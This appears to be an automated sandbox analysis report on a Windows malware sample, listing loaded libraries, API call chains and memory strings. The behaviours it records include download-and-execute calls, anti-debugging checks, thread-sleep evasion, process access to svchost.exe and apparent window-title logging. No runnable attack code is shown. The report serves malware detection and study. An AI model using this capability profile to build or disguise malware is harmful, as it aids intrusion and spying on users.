                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeReversingLabs: Detection: 84%
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CBE1
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_00457186 push ecx; ret 0_2_00457199
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_00457AA8 push eax; ret 0_2_00457AC6
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_00434EB6 push ecx; ret 0_2_00434EC9
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_00406EEB ShellExecuteW,URLDownloadToFileW,0_2_00406EEB
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041AADB
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CBE1
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_0040F7E2 Sleep,ExitProcess,0_2_0040F7E2
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_0041A7D9
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Window / User API: threadDelayed 3221
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Window / User API: threadDelayed 6303
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Window / User API: foregroundWindowGot 1770
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | TID: 3220 | Thread sleep count: 227 > 30
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | TID: 3220 | Thread sleep time: -113500s >= -30000s
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | TID: 3064 | Thread sleep count: 3221 > 30
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | TID: 3064 | Thread sleep time: -9663000s >= -30000s
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | TID: 3064 | Thread sleep count: 6303 > 30
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | TID: 3064 | Thread sleep time: -18909000s >= -30000s
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_0040928E
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C322
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C388
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_004096A0
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_00408847
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_00407877 FindFirstFileW,FindNextFileW,0_2_00407877
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_0044E8F9 FindFirstFileExA,0_2_0044E8F9
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB6B
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419B86
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD72
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407CD2
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@"b%SystemRoot%\system32\mswsock.dll
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216298859.000000000062E000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000003.2216085363.000000000061F000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4630176485.000000000062E000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | API call chain: ExitProcess graph end node | graph_0-48974
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00434A8A
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CBE1
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_00443355 mov eax, dword ptr fs:[00000030h] 0_2_00443355
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_004120B2 GetProcessHeap,HeapFree,0_2_004120B2
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0043503C
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00434A8A
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043BB71
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_00434BD8 SetUnhandledExceptionFilter,0_2_00434BD8
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 0_2_00412132
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_00419662 mouse_event,0_2_00419662
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager0Z\9
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagersInfo
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4630176485.0000000000629000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager0Z\19
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4630176485.0000000000629000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager$
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager0Z\05
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager0Z\7
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager0Z\
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager0Z\+
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager0Z\0
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4630176485.0000000000629000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerQ
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager0Z\N
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.000000000061F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager0Z\43E
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4630176485.0000000000629000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager\
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4629979476.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, logs.dat.0.dr | Binary or memory string: [Program Manager]
                          Source: 17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, 00000000.00000002.4630176485.0000000000629000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerz
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: 0_2_00434CB6 cpuid 0_2_00434CB6
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: GetLocaleInfoA,0_2_0040F90C
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: EnumSystemLocalesW,0_2_0045201B
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: EnumSystemLocalesW,0_2_004520B6
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00452143
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: GetLocaleInfoW,0_2_00452393
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: EnumSystemLocalesW,0_2_00448484
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004524BC
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: GetLocaleInfoW,0_2_004525C3
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00452690
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: GetLocaleInfoW,0_2_0044896D
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00451D58
                          Source: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe | Code function: EnumSystemLocalesW,0_2_00451FD0
